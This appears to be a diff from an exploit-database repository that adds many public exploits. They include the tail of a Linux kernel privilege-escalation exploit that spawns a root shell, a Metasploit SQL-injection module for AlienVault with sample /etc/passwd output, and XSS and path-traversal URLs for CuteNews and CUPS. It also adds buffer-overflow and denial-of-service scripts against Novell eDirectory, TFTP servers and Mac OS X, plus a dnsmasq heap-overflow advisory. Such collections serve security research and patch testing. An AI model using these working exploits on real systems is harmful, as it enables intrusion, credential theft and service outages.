printf("mmap fault\n");
exit(1);
}
memset((void*)mmap_start, 0x90, mmap_size);
char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
unsigned long *asd = &jump[4];
*asd = (unsigned long)kernel_code;
memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
if ( send(fd, &req, sizeof(req), 0) < 0) {
printf("bad send\n");
close(fd);
return -1;
}
printf("uid=%d, euid=%d\n",getuid(), geteuid() );
if(!getuid())
system("/bin/sh");
}

View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/36958/info
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
This issue affects versions prior to CUPS 1.4.2.
http://www.example.com/admin/?kerberos=onmouseover=alert

View file

@ -0,0 +1,72 @@
source: http://www.securityfocus.com/bid/37009/info
Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
Novell eDirectory 8.8 SP5 is vulnerable; other versions may also be affected.
#!usr\bin\perl
#Vulnerability has found by HACKATTACK
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
$address=$ARGV[0];
if(!$ARGV[0]){
print "Usage:perl $0 address\n";
exit();
}
$login = "$address/_LOGIN_SERVER_";
$url = "$address/dhost/";
$module = "modules?I:";
$buffer = "A" x 2000;
$vuln = $module.$buffer;
#Edit the username and password.
$user = "username";
$pass = "password";
#Edit the username and password.
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
$mechanize->submit_form(
form_name => "authenticator",
fields => {
usr => $user,
pwd => $pass},
button => 'Login');
$response2 = $mechanize->get("$url$vuln");

57
platforms/osx/dos/33337.c Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/36915/info
Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition.
Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users.
/*
Mac OS X 10.5.6/10.5.7 ptrace() mutex handling DoS
==================================================
This code should be run in a loop and due to problems
with mutex handling in ptrace a DoS can occur when a
destroyed mutex is attempted to be interlocked by OSX
kernel giving rise to a race condition. You may need
to run this code multiple times.
- Tested against 10.5.6
- Tested against 10.5.7
while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
This code is dedicated to a friend who I met in this
place. Long live the exploit scene. R.I.P str0ke.
-- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <stdio.h>
#include <stdlib.h>
int main(){
pid_t pid;
char *argv[] = {"id","","",0};
char *envp[] = {"",0};
pid = fork();
if(pid == 0){
usleep(100);
execve("/usr/bin/id",argv,envp);
}
else{
usleep(820);
if(ptrace(PT_ATTACH,pid,0,0)==0){
printf("[ PID: %d has been caught!\n",pid);
if(ptrace(PT_DETACH,pid,0,0)<0){
perror("Evil happens.");
}
usleep(1);
wait(0);
}
else{
perror("Fail!");
}
}
return(0);
}

264
platforms/php/webapps/33317.txt Executable file
View file

@ -0,0 +1,264 @@
Exploit Title: AlienVault newpolicyform.php SQLi
Date: 5/9/2014
Exploit Author: chrisdhebert[at]gmail.com
Vendor Homepage: http://www.alienvault.com/
Software Link: http://www.alienvault.com/free-downloads-services
Version: 4.6.1 and below
Tested on: Linux
CVE : n/a
Vendor Security Advisory : AV-11394 http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower
Timeline:
--------
4/14/2014 (Vulnerablity Discovered)
4/17/2014 (Vendor Informed with receipt)
5/5/2014 (Vendor Patch Released v4.7.0)
5/9/2014 (Public Release)
Vendor Discription:
------------------
OSSIM is the most widely used SIEM offering, thanks in no small part to the open source
community that has promoted its use. OSSIM provides all of the capabilities that a security
professional needs from a SIEM offering, event collection, normalization, correlation and
incident response - but it also does far more. Not simply satisfied with integrating data
from existing security tools, OSSIM is built on the Unified Security Management platform
which provides a common framework for the deployment, configuration, and management of your
security tools.
Vulnerability Details:
---------------------
The vulnerability can be classified as "SQL Injection" from authenticated users. No input validation is performed when processing parameters on the following request:
GET /ossim/policy/newpolicyform.php?insertafter='SQLi HTTP/1.1
Although this POC demonstrates READ access to files readable by u=mysql g=root o=all (such as /etc/passwd). It should be noted that, an attacker should be able to WRITE to a new file with sufficient permissions such as /tmp/newfile. After a quick search, exploiting this may be midigated by the current file permissions of /usr/share/*ossim/www/* and other vhosts handled by apache. For those with more time, other writeable locations could be leveraged with this vulnerablity.
Metasploit Module:
-----------------
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
newpolicyform.php using the 'insertinto' parameter. This module exploits the
lack of input filtering to read an arbitrary file from the file system.
Any authenticated user is able to exploit this, as administrator
privileges are not required.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Hebert <chrisdhebert[at]gmail.com>'
],
'References' =>
[
['EDB', '#####TBD####']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => "May 9 2014"))
register_options(
[
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
], self.class)
end
def run
print_status("#{peer} - Get a valid session cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
})
unless res and res.code == 200
print_error("#{peer} - Server did not respond in an expected way")
return
end
cookie = res.get_cookies
if cookie.blank?
print_error("#{peer} - Could not retrieve a cookie")
return
end
post = {
'embed' => '',
'bookmark_string' => '',
'user' => datastore['USERNAME'],
'passu' => datastore['PASSWORD'],
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
}
print_status("#{peer} - Login...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
unless res and res.code == 302
print_error("#{peer} - Server did not respond in an expected way")
return
end
unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
print_error("#{peer} - Authentication failed")
return
end
cookie = res.get_cookies
if cookie.blank?
print_error("#{peer} - Could not retrieve the authenticated cookie")
return
end
i = 0
full = ''
filename = datastore['FILEPATH'].unpack("H*")[0]
i = 0
full = ''
filename = datastore['FILEPATH'].unpack("H*")[0]
left_marker = Rex::Text.rand_text_alpha(6)
right_marker = Rex::Text.rand_text_alpha(6)
print_status("#{peer} - Exploiting SQLi...")
loop do
file = sqli(left_marker, right_marker, i, cookie, filename)
return if file.nil?
break if file.empty?
str = [file].pack("H*")
full << str
vprint_status(str)
i = i+1
end
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
print_good("File stored at path: " + path)
end
def sqli(left_marker, right_marker, i, cookie, filename)
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND ('xnDa'='xnDa"
get = {
'insertafter' => pay,
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),
'cookie' => cookie,
'vars_get' => get
})
if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/
return $1
else
print_error("Server did not respond in an expected way")
return nil
end
end
end
Metasploit Module Use Example:
-----------------------------
msf > use auxiliary/gather/alienvault_newpolicyform_sqli
msf auxiliary(alienvault_newpolicyform_sqli) > show options
Module options (auxiliary/gather/alienvault_newpolicyform_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes Path to remote file
PASSWORD putpasswordhere yes Single password
Proxies no Use a proxy chain
RHOST 192.168.1.1 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Relative URI of installation
USERNAME admin yes Single username
VHOST no HTTP server virtual host
msf auxiliary(alienvault_newpolicyform_sqli) > run
[*] 192.168.1.1:443 - Get a valid session cookie...
[*] 192.168.1.1:443 - Login...
[*] 192.168.1.1:443 - Exploiting SQLi...
[+] File stored at path: /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
[*] Auxiliary module execution completed
msf auxiliary(alienvault_newpolicyform_sqli) > cat /home/user/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
[*] exec: cat /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
root:x:0:0:root:/root:/usr/bin/llshell
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
munin:x:102:104::/var/lib/munin:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
avserver:x:106:111:AlienVault SIEM,,,:/home/avserver:/bin/false
avapi:x:107:111:AlienVault SIEM,,,:/home/avapi:/bin/bash
avidm:x:108:111:AlienVault IDM,,,:/home/avidm:/bin/false
ossec:x:1000:1000::/var/ossec/:/bin/false
ossecm:x:1001:1000::/var/ossec/:/bin/false
ossecr:x:1002:1000::/var/ossec/:/bin/false
ntop:x:109:112::/var/lib/ntop:/bin/false
avagent:x:110:111:AlienVault Agent,,,:/home/avagent:/bin/false
snort:x:111:113:Snort IDS:/var/log/snort:/bin/false
prads:x:112:114::/home/prads:/bin/false
nagios:x:113:115::/var/lib/nagios:/bin/false
stunnel4:x:114:116::/var/run/stunnel4:/bin/false
rabbitmq:x:115:117:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
mysql:x:116:118:MySQL Server,,,:/var/lib/mysql:/bin/false
msf auxiliary(alienvault_newpolicyform_sqli) >

22
platforms/php/webapps/33340.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/36971/info
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
Note that exploits for some of the issues may require administrator privilege.
Successful exploits may allow attackers to:
- obtain sensitive information
- gain unauthorized access to the affected application
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- hijack user sessions
- execute arbitrary commands in the context of the webserver process
A successful attack will compromise the application and may aid in further attacks.
http://www.example.com/test/cutenews/index.php?lastusername=&#039;%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
http://www.example.com/test/cutenews/index.php?mod=%3Cscript%3Ealert(/xss/)%3C/script%3E
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&cat_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&postponed_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&unapproved_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&news_per_page=%3Cscript%3Ealert(/xss/);%3C/script%3E

16
platforms/php/webapps/33341.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/36971/info
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
Note that exploits for some of the issues may require administrator privilege.
Successful exploits may allow attackers to:
- obtain sensitive information
- gain unauthorized access to the affected application
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- hijack user sessions
- execute arbitrary commands in the context of the webserver process
A successful attack will compromise the application and may aid in further attacks.
http://www.example.com/test/cutenews/search.php?dosearch=yes&from_date_day=a&from_date_month=5&from_date_year=2003&to_date_day=4&to_date_month=5&to_date_year=2010

18
platforms/php/webapps/33342.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/36971/info
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
Note that exploits for some of the issues may require administrator privilege.
Successful exploits may allow attackers to:
- obtain sensitive information
- gain unauthorized access to the affected application
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- hijack user sessions
- execute arbitrary commands in the context of the webserver process
A successful attack will compromise the application and may aid in further attacks.
http://www.example.com/test/cutenews/search.php?user=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
http://www.example.com/test/cutenews/search.php?title=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E

16
platforms/php/webapps/33343.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/36971/info
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
Note that exploits for some of the issues may require administrator privilege.
Successful exploits may allow attackers to:
- obtain sensitive information
- gain unauthorized access to the affected application
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- hijack user sessions
- execute arbitrary commands in the context of the webserver process
A successful attack will compromise the application and may aid in further attacks.
http://www.example.com/test/cutenews/register.php?result=%3Cscript%3Ealert(/XSS/);%3C/script%3E

16
platforms/php/webapps/33344.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/36971/info
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
Note that exploits for some of the issues may require administrator privilege.
Successful exploits may allow attackers to:
- obtain sensitive information
- gain unauthorized access to the affected application
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- hijack user sessions
- execute arbitrary commands in the context of the webserver process
A successful attack will compromise the application and may aid in further attacks.
http://www.example.com/test/cutenews/index.php?mod=addnews&action=addnews

17
platforms/php/webapps/33345.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/36971/info
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
Note that exploits for some of the issues may require administrator privilege.
Successful exploits may allow attackers to:
- obtain sensitive information
- gain unauthorized access to the affected application
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- hijack user sessions
- execute arbitrary commands in the context of the webserver process
A successful attack will compromise the application and may aid in further attacks.
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source=../users.db.php%00
http://www.example.com/test/cutenews/index.php?mod=editnews&action=editnews&id=1255182669&source=../users.db.php%00

39
platforms/windows/dos/33348.pl Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
# Date: 13/05/2014
# Exploit Author: j0s3h4x0r
# Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
# Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
# Version: 4.5 32 bits / 4.5 64 bits
# Tested on: [Windows 7 x64]
#this proof of concept code will crash tftpd32 and tftpd64
#you can try changing $j and $i loop limits
#most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
#and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
## Exploit-DB Note: $j=5, $i=2500 caused a crash.
#!/usr/bin/perl -w
use IO::Socket;
for (my $j = 0; $j < 2; $j++)
{
sleep(2);
for (my $i = 0; $i < 1500; $i++)
{
$st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
$p_c_buffer = "\x0c\x0d" x 10;
print $st_socket $p_c_buffer;
close($st_socket);
print "sent " . $i . "\n";
}
}
exit;

26
platforms/windows/dos/33350.xml Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/37007/info
Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected.
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
<script language='vbscript'>
arg1=String(11284, "A")
target.RegisterMe arg1
</script>
</job>
</package>

View file

@ -1,24 +1,24 @@
#!/usr/bin/python
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/pt360dos.py.txt
import socket
import sys
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = '"'*160
mode = "netascii"
muha = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(muha, (host, port))
# milw0rm.com [2008-03-26]
#!/usr/bin/python
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/pt360dos.py.txt
import socket
import sys
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = '"'*160
mode = "netascii"
muha = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(muha, (host, port))
# milw0rm.com [2008-03-26]

View file

@ -1,281 +1,281 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
1. *Advisory Information*
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958
3. *Vulnerability Description*
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
has been found that may allow an attacker to execute arbitrary code on
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
enabled ('--enable-tfp'). This service is not enabled by default on most
distributions; in particular it is not enabled by default on OpenWRT or
DD-WRT. Chances of successful exploitation increase when a long
directory prefix is used for TFTP. Code will be executed with the
privileges of the user running dnsmasq, which is normally a
non-privileged one.
Additionally there is a potential DoS attack to the TFTP service by
exploiting a null-pointer dereference vulnerability.
4. *Vulnerable packages*
. dnsmasq 2.40.
. dnsmasq 2.41.
. dnsmasq 2.42.
. dnsmasq 2.43.
. dnsmasq 2.44.
. dnsmasq 2.45.
. dnsmasq 2.46.
. dnsmasq 2.47.
. dnsmasq 2.48.
. dnsmasq 2.49.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. dnsmasq 2.50
6. *Vendor Information, Solutions and Workarounds*
If the TFTP service is enabled and patching is not available
immediately, a valid workaround is to filter TFTP for untrusted hosts in
the network (such as the Internet). This is the default configuration
when enabling TFTP on most home routers.
Patches are already available from the software author. Most
distributions should release updates for binary packages soon.
7. *Credits*
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
Herederos de Don Pablo" of Core Security Technologies.
The null-pointer dereference (CVE-2009-2958) was reported to the author
of dnsmasq independently by an uncredited code auditor. It was merged
with this advisory for user's convenience.
8. *Technical Description*
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
First let's focus on the overflow vulnerability. The 'tftp_request'
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
'MAXDNAME' bytes (defaulting to 1025).
/-----------
else if (filename[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, filename, MAXDNAME);
- -----------/
This may cause a heap overflow because 'daemon->namebuff' may already
contain data, namely the configured 'daemon->tftp_prefix' passed to the
daemon via a configuration file.
/-----------
if (daemon->tftp_prefix)
{
if (daemon->tftp_prefix[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
- -----------/
The default prefix is '/var/tftpd', but if a longer prefix is used,
arbitrary code execution may be possible.
Sending the string resulting from the execution of the following python
snippet to a vulnerable server, with a long enough directory prefix
configured, should crash the daemon.
/-----------
import sys
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
- -----------/
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
Now onto the null-pointer dereference. The user can crash the service by
handcrafting a packet, because of a problem on the guard of the first if
inside this code loop:
/-----------
while ((opt = next(&p, end)))
{
if (strcasecmp(opt, "blksize") == 0 &&
(opt = next(&p, end)) &&
!(daemon->options & OPT_TFTP_NOBLOCK))
{
transfer->blocksize = atoi(opt);
if (transfer->blocksize < 1)
transfer->blocksize = 1;
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
transfer->opt_blocksize = 1;
transfer->block = 0;
}
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
!transfer->netascii)
{
transfer->opt_transize = 1;
transfer->block = 0;
}
}
- -----------/
The problem exists because the guard of the first if includes the result
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
derrefence the null-pointer.
9. *Report Timeline*
. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,
including technical details of the vulnerability in an advisory draft.
. 2009-08-21:
Simon Kelley acknowledges the vulnerability and confirms to be working
on a patch. He also informs that he is aware that most home router
distributions have tftp turned off by default, and firewalled, and
suggests this should be mentioned on the advisory. Simon also mentions
that a NULL-pointer dereference bug has also been discovered on that
code, and suggests merging both bugs in the same advisory. Monday 31/08
is accepted as a possible release date for this advisory, and help is
offered in contacting package maintainers of dnsmasq for most operating
systems.
. 2009-08-21:
Core changes the advisory draft to accommodate Simon's suggestions.
About the NULL-pointer dereference, Core mentions the terms it thinks
appropriate for the bug to be merged into this advisory, and details how
this would affect the following procedures, such as asking for a
CVE/Bugtraq ID.
. 2009-08-23:
Simon Kelley contacts Core back, saying that the terms for the
null-pointer derrefence bug to be included in the advisory are ok. He
also mentions that the finder of this bug prefers to remain uncredited
in this advisory. Details are sent by him about the new bug so that the
advisory draft can be updated to include it.
. 2009-08-23:
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
each vulnerability reported in this advisory should be assigned its own.
. 2009-08-23:
Vincent Danen, from Red Hat's Security Response Team contacts Core in
order to discuss both vulnerabilities by a secure communications
channel, and offers its help in obtaining proper CVE numbers, specifying
they also believe a separate number should be assigned to each
vulnerability.
. 2009-08-23:
Core replies to Vincent Danen by sending its gpg key. Core also mentions
separate CVE numbers have already been asked.
. 2009-08-23:
Core replies to Simon Kelley, including a new advisory draft with both
bugs merged.
. 2009-08-23:
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
them to Red Hat and Simon Kelley.
. 2009-08-31:
The advisory CORE-2009-0820 is published.
10. *References*
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
[2] http://www.isi.edu/in-notes/ien/ien133.txt
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
wa3syAdyXlixVdQhdk5vcK0=
=tfqM
-----END PGP SIGNATURE-----
# milw0rm.com [2009-09-09]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
1. *Advisory Information*
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958
3. *Vulnerability Description*
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
has been found that may allow an attacker to execute arbitrary code on
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
enabled ('--enable-tfp'). This service is not enabled by default on most
distributions; in particular it is not enabled by default on OpenWRT or
DD-WRT. Chances of successful exploitation increase when a long
directory prefix is used for TFTP. Code will be executed with the
privileges of the user running dnsmasq, which is normally a
non-privileged one.
Additionally there is a potential DoS attack to the TFTP service by
exploiting a null-pointer dereference vulnerability.
4. *Vulnerable packages*
. dnsmasq 2.40.
. dnsmasq 2.41.
. dnsmasq 2.42.
. dnsmasq 2.43.
. dnsmasq 2.44.
. dnsmasq 2.45.
. dnsmasq 2.46.
. dnsmasq 2.47.
. dnsmasq 2.48.
. dnsmasq 2.49.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. dnsmasq 2.50
6. *Vendor Information, Solutions and Workarounds*
If the TFTP service is enabled and patching is not available
immediately, a valid workaround is to filter TFTP for untrusted hosts in
the network (such as the Internet). This is the default configuration
when enabling TFTP on most home routers.
Patches are already available from the software author. Most
distributions should release updates for binary packages soon.
7. *Credits*
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
Herederos de Don Pablo" of Core Security Technologies.
The null-pointer dereference (CVE-2009-2958) was reported to the author
of dnsmasq independently by an uncredited code auditor. It was merged
with this advisory for user's convenience.
8. *Technical Description*
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
